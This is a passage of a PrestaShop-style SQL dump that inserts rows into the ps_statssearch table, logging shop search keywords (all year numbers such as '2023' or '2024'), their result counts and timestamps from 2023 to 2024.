(1006, 1, 1, '2022', 0, '2023-02-16 07:33:13'),
(1007, 1, 1, '2023', 0, '2023-02-16 10:10:46'),
(1008, 1, 1, '2022', 0, '2023-02-16 10:24:08'),
(1009, 1, 1, '2023', 0, '2023-02-17 06:26:40'),
(1010, 1, 1, '2022', 0, '2023-02-17 09:13:05'),
(1011, 1, 1, '2022', 0, '2023-02-18 10:00:55'),
(1012, 1, 1, '2023', 0, '2023-02-18 10:34:31'),
(1013, 1, 1, '2023', 0, '2023-02-19 06:13:04'),
(1014, 1, 1, '2022', 0, '2023-02-19 06:28:03'),
(1015, 1, 1, '2022', 0, '2023-02-20 04:58:28'),
(1016, 1, 1, '2023', 0, '2023-02-20 07:06:43'),
(1017, 1, 1, '2022', 0, '2023-02-21 03:21:59'),
(1018, 1, 1, '2023', 0, '2023-02-21 06:30:29'),
(1019, 1, 1, '2023', 0, '2023-02-22 07:09:12'),
(1020, 1, 1, '2022', 0, '2023-02-22 13:21:05'),
(1021, 1, 1, '2023', 0, '2023-02-23 08:39:17'),
(1022, 1, 1, '2022', 0, '2023-02-23 23:24:52'),
(1023, 1, 1, '2022', 0, '2023-02-24 23:59:09'),
(1024, 1, 1, '2023', 0, '2023-02-25 04:46:12'),
(1025, 1, 1, '2022', 0, '2023-02-25 12:24:10'),
(1026, 1, 1, '2023', 0, '2023-02-25 17:31:31'),
(1027, 1, 1, '2022', 0, '2023-02-26 19:03:09'),
(1028, 1, 1, '2023', 0, '2023-02-26 20:52:31'),
(1029, 1, 1, '2023', 0, '2023-02-27 07:41:07'),
(1030, 1, 1, '2022', 0, '2023-02-27 08:16:35'),
(1031, 1, 1, '2022', 0, '2023-02-28 09:44:06'),
(1032, 1, 1, '2023', 0, '2023-02-28 11:17:57'),
(1033, 1, 1, '2023', 0, '2023-03-01 06:46:03'),
(1034, 1, 1, '2022', 0, '2023-03-01 08:44:45'),
(1035, 1, 1, '2023', 0, '2023-03-02 23:40:21'),
(1036, 1, 1, '2022', 0, '2023-03-02 23:41:56'),
(1037, 1, 1, '2022', 0, '2023-03-03 12:38:47'),
(1038, 1, 1, '2023', 0, '2023-03-03 14:54:18'),
(1039, 1, 1, '2023', 0, '2023-03-04 03:58:41'),
(1040, 1, 1, '2022', 0, '2023-03-04 04:34:29'),
(1041, 1, 1, '2022', 0, '2023-03-05 08:20:11'),
(1042, 1, 1, '2023', 0, '2023-03-05 10:42:36'),
(1043, 1, 1, '2022', 0, '2023-03-06 20:21:17'),
(1044, 1, 1, '2022', 0, '2023-03-07 12:14:00'),
(1045, 1, 1, '2023', 0, '2023-03-07 13:57:36'),
(1046, 1, 1, '2022', 0, '2023-03-08 06:26:39'),
(1047, 1, 1, '2023', 0, '2023-03-08 07:28:15'),
(1048, 1, 1, '2023', 0, '2023-03-09 16:45:07'),
(1049, 1, 1, '2022', 0, '2023-03-09 16:54:04'),
(1050, 1, 1, '2022', 0, '2023-03-10 12:43:20'),
(1051, 1, 1, '2023', 0, '2023-03-10 17:01:21'),
(1052, 1, 1, '2023', 0, '2023-03-11 05:56:35'),
(1053, 1, 1, '2022', 0, '2023-03-11 07:17:55'),
(1054, 1, 1, '2022', 0, '2023-03-12 08:59:18');
INSERT INTO `ps_statssearch` (`id_statssearch`, `id_shop`, `id_shop_group`, `keywords`, `results`, `date_add`) VALUES
(1055, 1, 1, '2023', 0, '2023-03-12 11:43:12'),
(1056, 1, 1, '2022', 0, '2023-03-13 19:05:39'),
(1057, 1, 1, '2023', 0, '2023-03-13 19:14:57'),
(1058, 1, 1, '2023', 0, '2023-03-14 17:25:33'),
(1059, 1, 1, '2022', 0, '2023-03-14 19:00:12'),
(1060, 1, 1, '2022', 0, '2023-03-15 10:51:01'),
(1061, 1, 1, '2023', 0, '2023-03-15 11:48:46'),
(1062, 1, 1, '2023', 0, '2023-03-17 04:57:55'),
(1063, 1, 1, '2022', 0, '2023-03-17 08:26:09'),
(1064, 1, 1, '2023', 0, '2023-03-18 02:13:19'),
(1065, 1, 1, '2022', 0, '2023-03-18 04:37:15'),
(1066, 1, 1, '2023', 0, '2023-03-18 13:44:24'),
(1067, 1, 1, '2022', 0, '2023-03-18 19:21:37'),
(1068, 1, 1, '2022', 0, '2023-03-19 09:41:58'),
(1069, 1, 1, '2023', 0, '2023-03-19 09:54:54'),
(1070, 1, 1, '2022', 0, '2023-03-20 07:13:50'),
(1071, 1, 1, '2023', 0, '2023-03-20 08:41:22'),
(1072, 1, 1, '2023', 0, '2023-03-21 14:52:40'),
(1073, 1, 1, '2022', 0, '2023-03-21 17:22:21'),
(1074, 1, 1, '2022', 0, '2023-03-22 19:38:41'),
(1075, 1, 1, '2023', 0, '2023-03-22 22:27:13'),
(1076, 1, 1, '2022', 0, '2023-03-23 06:34:58'),
(1077, 1, 1, '2023', 0, '2023-03-23 08:30:03'),
(1078, 1, 1, '2023', 0, '2023-03-24 11:49:27'),
(1079, 1, 1, '2022', 0, '2023-03-24 12:55:32'),
(1080, 1, 1, '2023', 0, '2023-03-24 15:03:49'),
(1081, 1, 1, '2023', 0, '2023-03-25 17:53:51'),
(1082, 1, 1, '2022', 0, '2023-03-25 18:12:10'),
(1083, 1, 1, '2022', 0, '2023-03-26 03:04:43'),
(1084, 1, 1, '2023', 0, '2023-03-26 09:19:14'),
(1085, 1, 1, '2022', 0, '2023-03-26 23:58:13'),
(1086, 1, 1, '2023', 0, '2023-03-27 08:27:08'),
(1087, 1, 1, '2022', 0, '2023-03-28 07:22:24'),
(1088, 1, 1, '2023', 0, '2023-03-28 10:29:24'),
(1089, 1, 1, '2022', 0, '2023-03-29 04:04:22'),
(1090, 1, 1, '2023', 0, '2023-03-29 05:16:32'),
(1091, 1, 1, '2022', 0, '2023-03-30 03:59:23'),
(1092, 1, 1, '2023', 0, '2023-03-30 06:33:52'),
(1093, 1, 1, '2023', 0, '2023-03-30 13:07:44'),
(1094, 1, 1, '2023', 0, '2023-03-31 11:18:30'),
(1095, 1, 1, '2022', 0, '2023-03-31 17:46:05'),
(1096, 1, 1, '2023', 0, '2023-04-01 10:28:14'),
(1097, 1, 1, '2022', 0, '2023-04-01 10:49:25'),
(1098, 1, 1, '2022', 0, '2023-04-02 20:54:10'),
(1099, 1, 1, '2023', 0, '2023-04-03 00:07:42'),
(1100, 1, 1, '2022', 0, '2023-04-03 21:08:15'),
(1101, 1, 1, '2023', 0, '2023-04-04 01:23:16'),
(1102, 1, 1, '2023', 0, '2023-04-04 08:34:02'),
(1103, 1, 1, '2022', 0, '2023-04-04 12:21:46'),
(1104, 1, 1, '2022', 0, '2023-04-05 04:18:20'),
(1105, 1, 1, '2023', 0, '2023-04-05 07:57:37'),
(1106, 1, 1, '2023', 0, '2023-04-06 21:29:33'),
(1107, 1, 1, '2022', 0, '2023-04-06 23:39:45'),
(1108, 1, 1, '2022', 0, '2023-04-07 15:24:07'),
(1109, 1, 1, '2023', 0, '2023-04-07 18:02:34'),
(1110, 1, 1, '2023', 0, '2023-04-08 08:57:21'),
(1111, 1, 1, '2022', 0, '2023-04-08 09:02:37'),
(1112, 1, 1, '2022', 0, '2023-04-09 00:03:28'),
(1113, 1, 1, '2023', 0, '2023-04-09 07:35:09'),
(1114, 1, 1, '2022', 0, '2023-04-09 23:56:10'),
(1115, 1, 1, '2022', 0, '2023-04-10 09:47:21'),
(1116, 1, 1, '2023', 0, '2023-04-10 11:11:04'),
(1117, 1, 1, '2023', 0, '2023-04-11 08:14:23'),
(1118, 1, 1, '2022', 0, '2023-04-11 10:49:25'),
(1119, 1, 1, '2023', 0, '2023-04-12 03:51:47'),
(1120, 1, 1, '2022', 0, '2023-04-12 10:01:56'),
(1121, 1, 1, '2023', 0, '2023-04-13 20:47:57'),
(1122, 1, 1, '2022', 0, '2023-04-14 04:45:58'),
(1123, 1, 1, '2022', 0, '2023-04-15 05:49:56'),
(1124, 1, 1, '2023', 0, '2023-04-15 10:57:46'),
(1125, 1, 1, '2022', 0, '2023-04-15 14:59:48'),
(1126, 1, 1, '2023', 0, '2023-04-15 15:53:03'),
(1127, 1, 1, '2023', 0, '2023-04-16 06:18:15'),
(1128, 1, 1, '2022', 0, '2023-04-16 07:48:12'),
(1129, 1, 1, '2022', 0, '2023-04-17 06:36:32'),
(1130, 1, 1, '2022', 0, '2023-04-17 08:29:48'),
(1131, 1, 1, '2023', 0, '2023-04-17 12:23:41'),
(1132, 1, 1, '2022', 0, '2023-04-18 18:18:21'),
(1133, 1, 1, '2023', 0, '2023-04-18 18:54:16'),
(1134, 1, 1, '2023', 0, '2023-04-19 14:24:55'),
(1135, 1, 1, '2022', 0, '2023-04-19 18:03:37'),
(1136, 1, 1, '2022', 0, '2023-04-21 02:31:01'),
(1137, 1, 1, '2023', 0, '2023-04-21 03:50:50'),
(1138, 1, 1, '2022', 0, '2023-04-21 15:05:33'),
(1139, 1, 1, '2023', 0, '2023-04-21 15:37:43'),
(1140, 1, 1, '2022', 0, '2023-04-22 09:57:54'),
(1141, 1, 1, '2023', 0, '2023-04-22 10:26:46'),
(1142, 1, 1, '2023', 0, '2023-04-23 09:08:15'),
(1143, 1, 1, '2022', 0, '2023-04-23 11:38:09'),
(1144, 1, 1, '2023', 0, '2023-04-24 03:28:10'),
(1145, 1, 1, '2022', 0, '2023-04-24 06:50:58'),
(1146, 1, 1, '2023', 0, '2023-04-25 05:29:39'),
(1147, 1, 1, '2022', 0, '2023-04-25 05:36:25'),
(1148, 1, 1, '2022', 0, '2023-04-26 12:47:44'),
(1149, 1, 1, '2022', 0, '2023-04-26 16:42:05'),
(1150, 1, 1, '2023', 0, '2023-04-26 18:14:29'),
(1151, 1, 1, '2023', 0, '2023-04-27 23:52:56'),
(1152, 1, 1, '2022', 0, '2023-04-28 04:36:11'),
(1153, 1, 1, '2023', 0, '2023-04-28 06:48:26'),
(1154, 1, 1, '2022', 0, '2023-04-29 05:35:12'),
(1155, 1, 1, '2023', 0, '2023-04-29 12:18:13'),
(1156, 1, 1, '2022', 0, '2023-04-30 09:42:48'),
(1157, 1, 1, '2023', 0, '2023-04-30 10:14:54'),
(1158, 1, 1, '2023', 0, '2023-05-01 03:25:43'),
(1159, 1, 1, '2022', 0, '2023-05-01 05:32:31'),
(1160, 1, 1, '2023', 0, '2023-05-01 07:42:38'),
(1161, 1, 1, '2022', 0, '2023-05-02 11:37:08'),
(1162, 1, 1, '2023', 0, '2023-05-02 11:41:57'),
(1163, 1, 1, '2022', 0, '2023-05-04 13:41:05'),
(1164, 1, 1, '2023', 0, '2023-05-04 14:21:25'),
(1165, 1, 1, '2022', 0, '2023-05-05 11:30:53'),
(1166, 1, 1, '2023', 0, '2023-05-05 12:59:41'),
(1167, 1, 1, '2023', 0, '2023-05-06 20:12:23'),
(1168, 1, 1, '2022', 0, '2023-05-07 01:05:30'),
(1169, 1, 1, '2023', 0, '2023-05-09 14:53:26'),
(1170, 1, 1, '2022', 0, '2023-05-09 15:21:07'),
(1171, 1, 1, '2022', 0, '2023-05-29 19:38:45'),
(1172, 1, 1, '2022', 0, '2023-05-29 19:46:45'),
(1173, 1, 1, '2024', 0, '2023-06-14 13:30:54'),
(1174, 1, 1, '2024', 0, '2023-06-14 13:32:24'),
(1175, 1, 1, '2023', 0, '2023-06-14 14:19:55'),
(1176, 1, 1, '2024', 0, '2023-06-16 12:54:56'),
(1177, 1, 1, '2023', 0, '2023-06-17 17:03:09'),
(1178, 1, 1, '2023', 0, '2023-06-19 11:33:31'),
(1179, 1, 1, '2023', 0, '2023-06-19 14:07:04'),
(1180, 1, 1, '2023', 0, '2023-06-22 15:48:47'),
(1181, 1, 1, '2024', 0, '2023-06-22 15:53:08'),
(1182, 1, 1, '2022', 0, '2023-06-25 14:02:14'),
(1183, 1, 1, '2024', 0, '2023-06-26 11:30:55'),
(1184, 1, 1, '2023', 0, '2023-06-26 21:41:04'),
(1185, 1, 1, '2023', 0, '2023-06-29 04:05:33'),
(1186, 1, 1, '2024', 0, '2023-06-29 08:25:51'),
(1187, 1, 1, '2023', 0, '2023-06-29 13:22:03'),
(1188, 1, 1, '2024', 0, '2023-06-29 13:46:41'),
(1189, 1, 1, '2024', 0, '2023-06-29 13:50:17'),
(1190, 1, 1, '2023', 0, '2023-06-29 17:07:05'),
(1191, 1, 1, '2024', 0, '2023-06-29 18:00:02'),
(1192, 1, 1, '2024', 0, '2023-06-29 20:14:45'),
(1193, 1, 1, '2023', 0, '2023-06-29 21:21:06'),
(1194, 1, 1, '2024', 0, '2023-06-30 01:21:52'),
(1195, 1, 1, '2023', 0, '2023-06-30 01:49:08'),
(1196, 1, 1, '2023', 0, '2023-06-30 20:58:13'),
(1197, 1, 1, '2024', 0, '2023-06-30 21:29:36'),
(1198, 1, 1, '2024', 0, '2023-07-01 06:03:15'),
(1199, 1, 1, '2024', 0, '2023-07-01 20:11:01'),
(1200, 1, 1, '2023', 0, '2023-07-01 21:36:01'),
(1201, 1, 1, '2023', 0, '2023-07-03 03:43:25'),
(1202, 1, 1, '2024', 0, '2023-07-03 05:33:04'),
(1203, 1, 1, '2023', 0, '2023-07-03 10:48:16'),
(1204, 1, 1, '2024', 0, '2023-07-03 16:24:13'),
(1205, 1, 1, '2024', 0, '2023-07-03 18:23:48'),
(1206, 1, 1, '2023', 0, '2023-07-03 18:29:31'),
(1207, 1, 1, '2023', 0, '2023-07-05 09:59:50'),
(1208, 1, 1, '2024', 0, '2023-07-05 10:55:37'),
(1209, 1, 1, '2023', 0, '2023-07-05 15:13:27'),
(1210, 1, 1, '2024', 0, '2023-07-05 19:16:50'),
(1211, 1, 1, '2024', 0, '2023-07-06 23:31:57'),
(1212, 1, 1, '2023', 0, '2023-07-06 23:52:40'),
(1213, 1, 1, '2023', 0, '2023-07-09 05:57:50'),
(1214, 1, 1, '2024', 0, '2023-07-09 07:58:23'),
(1215, 1, 1, '2024', 0, '2023-07-10 20:34:29'),
(1216, 1, 1, '2024', 0, '2023-07-10 20:38:13'),
(1217, 1, 1, '2024', 0, '2023-07-11 03:50:29'),
(1218, 1, 1, '2023', 0, '2023-07-11 05:06:24'),
(1219, 1, 1, '2023', 0, '2023-07-11 11:54:12'),
(1220, 1, 1, '2024', 0, '2023-07-11 13:15:10'),
(1221, 1, 1, '2023', 0, '2023-07-11 17:09:30'),
(1222, 1, 1, '2024', 0, '2023-07-11 19:07:01'),
(1223, 1, 1, '2023', 0, '2023-07-12 02:29:56'),
(1224, 1, 1, '2024', 0, '2023-07-12 03:02:44'),
(1225, 1, 1, '2024', 0, '2023-07-12 07:44:28'),
(1226, 1, 1, '2023', 0, '2023-07-12 09:00:22'),
(1227, 1, 1, '2023', 0, '2023-07-13 00:10:58'),
(1228, 1, 1, '2024', 0, '2023-07-13 07:36:20'),
(1229, 1, 1, '2024', 0, '2023-07-14 01:03:52'),
(1230, 1, 1, '2023', 0, '2023-07-14 04:22:23'),
(1231, 1, 1, '2024', 0, '2023-07-14 10:37:55'),
(1232, 1, 1, '2023', 0, '2023-07-14 11:58:47'),
(1233, 1, 1, '2024', 0, '2023-07-17 04:30:09'),
(1234, 1, 1, '2023', 0, '2023-07-17 05:13:38'),
(1235, 1, 1, '2024', 0, '2023-07-18 03:41:56'),
(1236, 1, 1, '2023', 0, '2023-07-20 01:47:45'),
(1237, 1, 1, '2023', 0, '2023-07-20 01:50:26'),
(1238, 1, 1, '2024', 0, '2023-07-20 02:38:29'),
(1239, 1, 1, '2024', 0, '2023-07-20 18:01:51'),
(1240, 1, 1, '2024', 0, '2023-07-20 18:04:29'),
(1241, 1, 1, '2024', 0, '2023-07-21 05:09:38'),
(1242, 1, 1, '2023', 0, '2023-07-21 06:42:36'),
(1243, 1, 1, '2024', 0, '2023-07-21 20:08:08'),
(1244, 1, 1, '2023', 0, '2023-07-21 20:14:44'),
(1245, 1, 1, '2024', 0, '2023-07-21 20:52:32'),
(1246, 1, 1, '2023', 0, '2023-07-21 22:15:37'),
(1247, 1, 1, '2024', 0, '2023-07-22 01:33:57'),
(1248, 1, 1, '2023', 0, '2023-07-22 03:21:44'),
(1249, 1, 1, '2023', 0, '2023-07-23 20:35:37'),
(1250, 1, 1, '2024', 0, '2023-07-23 21:27:44'),
(1251, 1, 1, '2024', 0, '2023-07-25 16:14:00'),
(1252, 1, 1, '2023', 0, '2023-07-25 17:07:46'),
(1253, 1, 1, '2023', 0, '2023-07-25 19:11:28'),
(1254, 1, 1, '2024', 0, '2023-07-25 22:19:25'),
(1255, 1, 1, '2024', 0, '2023-07-25 23:41:34'),
(1256, 1, 1, '2023', 0, '2023-07-26 03:26:41'),
(1257, 1, 1, '2024', 0, '2023-07-27 18:45:41'),
(1258, 1, 1, '2023', 0, '2023-07-27 20:18:40'),
(1259, 1, 1, '2024', 0, '2023-07-28 01:20:34'),
(1260, 1, 1, '2023', 0, '2023-07-28 04:48:27'),
(1261, 1, 1, '2023', 0, '2023-07-29 23:47:53'),
(1262, 1, 1, '2024', 0, '2023-07-30 00:20:06'),
(1263, 1, 1, '2024', 0, '2023-07-30 04:06:10'),
(1264, 1, 1, '2023', 0, '2023-07-30 06:12:46'),
(1265, 1, 1, '2023', 0, '2023-07-31 23:20:42'),
(1266, 1, 1, '2024', 0, '2023-08-02 15:13:38'),
(1267, 1, 1, '2024', 0, '2023-08-02 18:13:16'),
(1268, 1, 1, '2023', 0, '2023-08-02 22:21:20'),
(1269, 1, 1, '2024', 0, '2023-08-03 01:04:31'),
(1270, 1, 1, '2023', 0, '2023-08-03 02:32:21'),
(1271, 1, 1, '2024', 0, '2023-08-04 13:00:06'),
(1272, 1, 1, '2023', 0, '2023-08-04 14:06:10'),
(1273, 1, 1, '2023', 0, '2023-08-05 03:11:03'),
(1274, 1, 1, '2024', 0, '2023-08-05 03:27:12'),
(1275, 1, 1, '2024', 0, '2023-08-05 13:46:05'),
(1276, 1, 1, '2023', 0, '2023-08-05 13:59:05'),
(1277, 1, 1, '2024', 0, '2023-08-05 15:32:03'),
(1278, 1, 1, '2023', 0, '2023-08-07 10:24:55'),
(1279, 1, 1, '2024', 0, '2023-08-07 11:50:55'),
(1280, 1, 1, '2024', 0, '2023-08-07 22:17:40'),
(1281, 1, 1, '2023', 0, '2023-08-07 23:09:28'),
(1282, 1, 1, '2023', 0, '2023-08-08 04:57:35'),
(1283, 1, 1, '2024', 0, '2023-08-08 05:43:30'),
(1284, 1, 1, '2023', 0, '2023-08-09 11:16:25'),
(1285, 1, 1, '2024', 0, '2023-08-12 05:19:40'),
(1286, 1, 1, '2023', 0, '2023-08-14 00:33:58'),
(1287, 1, 1, '2023', 0, '2023-08-16 01:01:08'),
(1288, 1, 1, '2024', 0, '2023-08-16 04:42:18'),
(1289, 1, 1, '2023', 0, '2023-08-18 20:13:36'),
(1290, 1, 1, '2023', 0, '2023-08-31 08:51:56'),
(1291, 1, 1, '2024', 0, '2023-08-31 10:05:11'),
(1292, 1, 1, '2023', 0, '2023-09-10 16:57:20'),
(1293, 1, 1, '2024', 0, '2023-09-12 17:37:09'),
(1294, 1, 1, '2023', 0, '2023-09-12 23:24:34'),
(1295, 1, 1, '2024', 0, '2023-09-13 13:33:40'),
(1296, 1, 1, '2023', 0, '2023-09-15 07:22:45'),
(1297, 1, 1, '2023', 0, '2023-09-15 11:06:46'),
(1298, 1, 1, '2024', 0, '2023-09-16 00:28:01'),
(1299, 1, 1, '2023', 0, '2023-09-16 02:09:46'),
(1300, 1, 1, '2023', 0, '2023-09-16 02:24:28'),
(1301, 1, 1, '2024', 0, '2023-09-16 04:18:18'),
(1302, 1, 1, '2023', 0, '2023-09-17 02:35:17'),
(1303, 1, 1, '2024', 0, '2023-09-17 15:30:50'),
(1304, 1, 1, '2024', 0, '2023-09-19 01:34:47'),
(1305, 1, 1, '2023', 0, '2023-09-19 15:38:04'),
(1306, 1, 1, '2023', 0, '2023-09-21 04:26:15'),
(1307, 1, 1, '2024', 0, '2023-09-21 07:54:19'),
(1308, 1, 1, '2023', 0, '2023-09-22 17:10:56'),
(1309, 1, 1, '2024', 0, '2023-09-22 21:06:25'),
(1310, 1, 1, '2023', 0, '2023-09-23 00:43:23'),
(1311, 1, 1, '2024', 0, '2023-09-23 09:39:24'),
(1312, 1, 1, '2024', 0, '2023-09-25 11:21:32'),
(1313, 1, 1, '2023', 0, '2023-09-25 16:55:30'),
(1314, 1, 1, '2024', 0, '2023-09-27 16:53:35'),
(1315, 1, 1, '2023', 0, '2023-09-27 20:46:35'),
(1316, 1, 1, '2023', 0, '2023-09-30 07:58:25'),
(1317, 1, 1, '2024', 0, '2023-09-30 17:57:22'),
(1318, 1, 1, '2023', 0, '2023-10-01 00:01:53'),
(1319, 1, 1, '2024', 0, '2023-10-01 01:56:58'),
(1320, 1, 1, '2024', 0, '2023-10-01 22:18:22'),
(1321, 1, 1, '2023', 0, '2023-10-02 07:13:21'),
(1322, 1, 1, '2023', 0, '2023-10-02 15:22:13'),
(1323, 1, 1, '2024', 0, '2023-10-02 17:48:41'),
(1324, 1, 1, '2024', 0, '2023-10-04 17:55:46'),
(1325, 1, 1, '2023', 0, '2023-10-05 01:03:05'),
(1326, 1, 1, '2023', 0, '2023-10-05 22:27:14'),
(1327, 1, 1, '2023', 0, '2023-10-06 21:40:37'),
(1328, 1, 1, '2024', 0, '2023-10-07 03:04:46'),
(1329, 1, 1, '2023', 0, '2023-10-07 20:01:37'),
(1330, 1, 1, '2024', 0, '2023-10-08 23:46:17'),
(1331, 1, 1, '2023', 0, '2023-10-09 00:05:18'),
(1332, 1, 1, '2024', 0, '2023-10-09 21:25:17'),
(1333, 1, 1, '2024', 0, '2023-10-09 23:23:30'),
(1334, 1, 1, '2023', 0, '2023-10-10 02:04:19'),
(1335, 1, 1, '2023', 0, '2023-10-10 19:13:09'),
(1336, 1, 1, '2023', 0, '2023-10-11 02:59:53'),
(1337, 1, 1, '2024', 0, '2023-10-11 03:02:50'),
(1338, 1, 1, '2024', 0, '2023-10-12 04:30:21'),
(1339, 1, 1, '2023', 0, '2023-10-12 07:24:35'),
(1340, 1, 1, '2023', 0, '2023-10-13 22:43:53'),
(1341, 1, 1, '2024', 0, '2023-10-13 23:57:49'),
(1342, 1, 1, '2024', 0, '2023-10-16 01:42:33'),
(1343, 1, 1, '2024', 0, '2023-10-16 02:55:37'),
(1344, 1, 1, '2023', 0, '2023-10-16 07:14:45'),
(1345, 1, 1, '2023', 0, '2023-10-17 12:45:31'),
(1346, 1, 1, '2024', 0, '2023-10-17 20:45:31'),
(1347, 1, 1, '2024', 0, '2023-10-18 23:12:22'),
(1348, 1, 1, '2024', 0, '2023-10-19 19:04:14'),
(1349, 1, 1, '2023', 0, '2023-10-20 00:46:58'),
(1350, 1, 1, '2023', 0, '2023-10-22 01:27:27'),
(1351, 1, 1, '2024', 0, '2023-10-23 00:09:45'),
(1352, 1, 1, '2023', 0, '2023-10-23 09:45:47'),
(1353, 1, 1, '2024', 0, '2023-10-23 13:11:49'),
(1354, 1, 1, '2024', 0, '2023-10-25 12:59:20'),
(1355, 1, 1, '2023', 0, '2023-10-25 14:27:50'),
(1356, 1, 1, '2023', 0, '2023-10-26 01:48:43'),
(1357, 1, 1, '2024', 0, '2023-10-27 12:20:38'),
(1358, 1, 1, '2023', 0, '2023-10-27 17:22:32'),
(1359, 1, 1, '2024', 0, '2023-10-30 18:32:06'),
(1360, 1, 1, '2024', 0, '2023-11-01 23:16:48'),
(1361, 1, 1, '2023', 0, '2023-11-02 12:28:48'),
(1362, 1, 1, '2024', 0, '2023-11-03 05:48:49'),
(1363, 1, 1, '2023', 0, '2023-11-04 02:24:11'),
(1364, 1, 1, '2024', 0, '2023-11-05 12:25:32'),
(1365, 1, 1, '2023', 0, '2023-11-07 13:28:43'),
(1366, 1, 1, '2023', 0, '2023-11-08 21:10:12'),
(1367, 1, 1, '2024', 0, '2023-11-09 06:44:24'),
(1368, 1, 1, '2024', 0, '2023-11-10 00:56:15'),
(1369, 1, 1, '2023', 0, '2023-11-10 11:23:35'),
(1370, 1, 1, '2023', 0, '2023-11-13 08:40:00'),
(1371, 1, 1, '2023', 0, '2023-11-13 14:34:40'),
(1372, 1, 1, '2022', 0, '2023-11-13 23:12:50'),
(1373, 1, 1, '2023', 0, '2023-11-14 09:15:11'),
(1374, 1, 1, '2024', 0, '2023-11-14 18:03:24'),
(1375, 1, 1, '2024', 0, '2023-11-15 07:09:21'),
(1376, 1, 1, '2024', 0, '2023-11-15 14:07:54'),
(1377, 1, 1, '2023', 0, '2023-11-15 23:18:40'),
(1378, 1, 1, '2024', 0, '2023-11-16 08:21:06'),
(1379, 1, 1, '2023', 0, '2023-11-17 03:17:52'),
(1380, 1, 1, '2023', 0, '2023-11-18 05:23:24'),
(1381, 1, 1, '2023', 0, '2023-11-18 06:05:47'),
(1382, 1, 1, '2024', 0, '2023-11-18 06:46:04'),
(1383, 1, 1, '2024', 0, '2023-11-18 14:00:14'),
(1384, 1, 1, '2024', 0, '2023-11-19 03:36:02'),
(1385, 1, 1, '2023', 0, '2023-11-19 07:18:04'),
(1386, 1, 1, '2024', 0, '2023-11-22 12:31:15'),
(1387, 1, 1, '2023', 0, '2023-11-22 19:20:14'),
(1388, 1, 1, '2022', 0, '2023-11-24 15:35:33'),
(1389, 1, 1, '2023', 0, '2023-11-24 23:49:03'),
(1390, 1, 1, '2023', 0, '2023-12-03 13:16:10'),
(1391, 1, 1, '2024', 0, '2023-12-03 19:29:49'),
(1392, 1, 1, '2024', 0, '2023-12-05 01:04:31'),
(1393, 1, 1, '2024', 0, '2023-12-06 12:16:58'),
(1394, 1, 1, '2024', 0, '2023-12-14 19:06:22'),
(1395, 1, 1, '2023', 0, '2023-12-17 17:11:24'),
(1396, 1, 1, '2023', 0, '2023-12-19 15:02:27'),
(1397, 1, 1, '2023', 0, '2023-12-20 22:16:45'),
(1398, 1, 1, '2024', 0, '2023-12-22 00:08:15'),
(1399, 1, 1, '2023', 0, '2023-12-25 17:19:06'),
(1400, 1, 1, '2023', 0, '2023-12-26 19:21:41'),
(1401, 1, 1, '2024', 0, '2023-12-27 03:31:58'),
(1402, 1, 1, '2024', 0, '2023-12-27 12:12:47'),
(1403, 1, 1, '2024', 0, '2023-12-28 22:29:22'),
(1404, 1, 1, '2022', 0, '2023-12-29 08:47:18'),
(1405, 1, 1, '2023', 0, '2023-12-30 19:27:53'),
(1406, 1, 1, '2023', 0, '2024-01-04 17:29:27'),
(1407, 1, 1, '2023', 0, '2024-01-05 16:28:03'),
(1408, 1, 1, '2023', 0, '2024-01-06 13:21:45'),
(1409, 1, 1, '2023', 0, '2024-01-09 04:10:40'),
(1410, 1, 1, '2023', 0, '2024-01-09 16:10:38'),
(1411, 1, 1, '2024', 0, '2024-01-12 05:00:25'),
(1412, 1, 1, '2023', 0, '2024-01-14 02:20:00'),
(1413, 1, 1, '2023', 0, '2024-01-16 09:46:51'),
(1414, 1, 1, '2023', 0, '2024-01-17 21:54:25'),
(1415, 1, 1, '2023', 0, '2024-01-21 14:29:58'),
(1416, 1, 1, '2024', 0, '2024-01-27 07:39:01'),
(1417, 1, 1, '2023', 0, '2024-01-28 16:44:38'),
(1418, 1, 1, '2024', 0, '2024-01-30 07:17:37'),
(1419, 1, 1, '2024', 0, '2024-01-30 17:59:44'),
(1420, 1, 1, '2024', 0, '2024-01-31 21:05:27'),
(1421, 1, 1, '2024', 0, '2024-02-03 04:38:09'),
(1422, 1, 1, '2023', 0, '2024-02-07 17:54:56'),
(1423, 1, 1, '2024', 0, '2024-02-08 11:45:42'),
(1424, 1, 1, '2023', 0, '2024-02-08 22:41:10'),
(1425, 1, 1, '2023', 0, '2024-02-10 21:40:07'),
(1426, 1, 1, '2022', 3, '2024-02-10 22:44:09'),
(1427, 1, 1, '2023', 0, '2024-02-11 23:51:14'),
(1428, 1, 1, '2023', 0, '2024-02-12 04:21:10'),
(1429, 1, 1, '2024', 0, '2024-02-12 06:49:59'),
(1430, 1, 1, '2024', 0, '2024-02-15 03:21:58'),
(1431, 1, 1, '2025', 0, '2024-02-15 04:44:56'),
(1432, 1, 1, '2025', 0, '2024-02-15 04:47:01'),
(1433, 1, 1, '2025', 0, '2024-02-15 04:47:03'),
(1434, 1, 1, '2023', 0, '2024-02-15 23:59:08'),
(1435, 1, 1, '2025', 0, '2024-02-16 05:11:13'),
(1436, 1, 1, '2023', 0, '2024-02-16 05:57:10'),
(1437, 1, 1, '2025', 0, '2024-02-16 11:10:18'),
(1438, 1, 1, '2024', 0, '2024-02-17 17:46:04'),
(1439, 1, 1, '2022', 3, '2024-02-19 01:05:40'),
(1440, 1, 1, '2024', 0, '2024-02-20 15:01:17'),
(1441, 1, 1, '2023', 0, '2024-02-21 10:09:58'),
(1442, 1, 1, '2023', 0, '2024-02-22 05:46:25'),
(1443, 1, 1, '2023', 0, '2024-02-23 12:00:04'),
(1444, 1, 1, '2024', 0, '2024-02-23 22:03:56'),
(1445, 1, 1, '2024', 0, '2024-02-26 13:10:24'),
(1446, 1, 1, '2023', 0, '2024-02-26 15:39:37'),
(1447, 1, 1, '2025', 0, '2024-02-26 19:56:42'),
(1448, 1, 1, '2023', 0, '2024-02-27 03:14:55'),
(1449, 1, 1, '2023', 0, '2024-02-28 12:35:33'),
(1450, 1, 1, '2023', 0, '2024-02-29 08:20:09'),
(1451, 1, 1, '2024', 0, '2024-03-01 10:45:36'),
(1452, 1, 1, '2023', 0, '2024-03-02 12:52:44'),
(1453, 1, 1, '2025', 0, '2024-03-05 18:42:35'),
(1454, 1, 1, '2024', 0, '2024-03-10 11:35:55'),
(1455, 1, 1, '2022', 3, '2024-03-14 10:59:08'),
(1456, 1, 1, '2025', 0, '2024-03-14 22:06:22'),
(1457, 1, 1, '2025', 0, '2024-03-15 07:14:50'),
